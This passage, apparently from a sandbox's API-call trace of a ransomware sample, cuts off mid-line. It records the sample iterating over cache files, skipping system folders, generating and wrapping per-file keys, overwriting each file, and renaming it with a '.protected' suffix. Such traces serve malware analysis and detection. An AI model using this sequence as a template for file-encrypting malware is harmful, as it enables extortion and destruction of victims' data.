lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="Program Files (x86)") returned -1 [0088.369] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="$Recycle.bin") returned 1 [0088.369] lstrcmpiW (lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="System Volume Information") returned -1 [0088.369] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 151 [0088.369] StrStrIW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".protected") returned 0x0 [0088.369] lstrcmpW 
(lpString1="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpString2="RESTORE_FILES.txt") returned -1 [0088.369] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.370] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.370] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 151 [0088.370] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".txt") returned 0x0 [0088.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 151 [0088.370] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".rar") returned 0x0 [0088.370] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD") returned 151 [0088.370] StrStrW (lpFirst="7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD", lpSrch=".zip") returned 0x0 [0088.370] ReadFile (in: 
hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.402] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.402] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.402] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.402] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.403] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.403] CloseHandle (hObject=0x150) returned 1 [0088.403] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.protected") returned 161 [0088.403] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\7D266D9E1E69FA1EEFB9699B009B34C8_1D5A876A9113EC07224C45E5A870E3BD.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\7d266d9e1e69fa1eefb9699b009b34c8_1d5a876a9113ec07224c45e5a870e3bd.protected")) returned 1 [0088.404] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.404] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Windows") returned -1 [0088.404] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Program Files") returned -1 [0088.404] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="Program Files (x86)") returned -1 [0088.404] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="$Recycle.bin") returned 1 [0088.404] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="System Volume Information") returned -1 [0088.404] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 151 [0088.404] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".protected") returned 0x0 [0088.404] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpString2="RESTORE_FILES.txt") returned -1 [0088.405] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.405] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, 
pdwDataLen=0x295e794*=0x30) returned 1 [0088.405] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 151 [0088.407] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".txt") returned 0x0 [0088.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 151 [0088.407] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".rar") returned 0x0 [0088.407] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0") returned 151 [0088.407] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0", lpSrch=".zip") returned 0x0 [0088.407] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.412] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.412] WriteFile (in: 
hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.413] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.413] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.413] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.413] CloseHandle (hObject=0x150) returned 1 [0088.413] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.protected") returned 161 [0088.413] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_234CB5D64705D4DBB4DA839716359AF0.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_234cb5d64705d4dbb4da839716359af0.protected")) returned 1 [0088.414] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0088.414] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Windows") returned -1 [0088.414] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Program Files") returned -1 [0088.414] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="Program Files (x86)") returned -1 [0088.414] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="$Recycle.bin") returned 1 [0088.414] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="System Volume Information") returned -1 [0088.414] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 151 [0088.414] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".protected") returned 0x0 [0088.414] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpString2="RESTORE_FILES.txt") returned -1 [0088.414] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.414] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.414] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 151 [0088.416] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".txt") returned 0x0 [0088.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 151 [0088.416] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".rar") returned 0x0 [0088.416] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E") returned 151 [0088.416] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E", lpSrch=".zip") returned 0x0 [0088.416] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.420] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.420] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.420] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.420] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.420] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.421] CloseHandle (hObject=0x150) returned 1 [0088.421] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.protected") returned 161 [0088.421] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_294110D6990EE392327F8A606D55BC1E.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_294110d6990ee392327f8a606d55bc1e.protected")) returned 1 [0088.425] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.425] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Windows") returned -1 [0088.425] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="Program Files") returned -1 [0088.425] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", 
lpString2="Program Files (x86)") returned -1 [0088.425] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="$Recycle.bin") returned 1 [0088.425] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="System Volume Information") returned -1 [0088.425] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 151 [0088.425] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".protected") returned 0x0 [0088.425] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpString2="RESTORE_FILES.txt") returned -1 [0088.425] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.425] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.425] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 151 [0088.430] StrStrW 
(lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".txt") returned 0x0 [0088.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 151 [0088.430] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".rar") returned 0x0 [0088.430] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1") returned 151 [0088.430] StrStrW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1", lpSrch=".zip") returned 0x0 [0088.430] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffe31, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.431] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x1cf, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x1cf, lpOverlapped=0x0) returned 1 [0088.431] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.431] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.431] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, 
lpOverlapped=0x0) returned 1 [0088.432] CloseHandle (hObject=0x150) returned 1 [0088.432] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.protected") returned 161 [0088.432] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_50167909FCFE0C66153F1901439CBBA1.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\8059e9a0d314877e40fe93d8ccfb3c69_50167909fcfe0c66153f1901439cbba1.protected")) returned 1 [0088.433] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.433] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Windows") returned -1 [0088.433] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Program Files") returned -1 [0088.433] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="Program Files (x86)") returned -1 [0088.433] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="$Recycle.bin") returned 1 [0088.433] lstrcmpiW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="System Volume Information") returned -1 [0088.433] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E") returned 151 [0088.433] StrStrIW (lpFirst="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpSrch=".protected") returned 0x0 [0088.433] lstrcmpW (lpString1="8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E", lpString2="RESTORE_FILES.txt") returned -1 [0088.433] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.433] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\8059E9A0D314877E40FE93D8CCFB3C69_581C904DB5924E46A6C1A8637614A40E" (normalized: "c:\\users\\5p5nrgjn0js 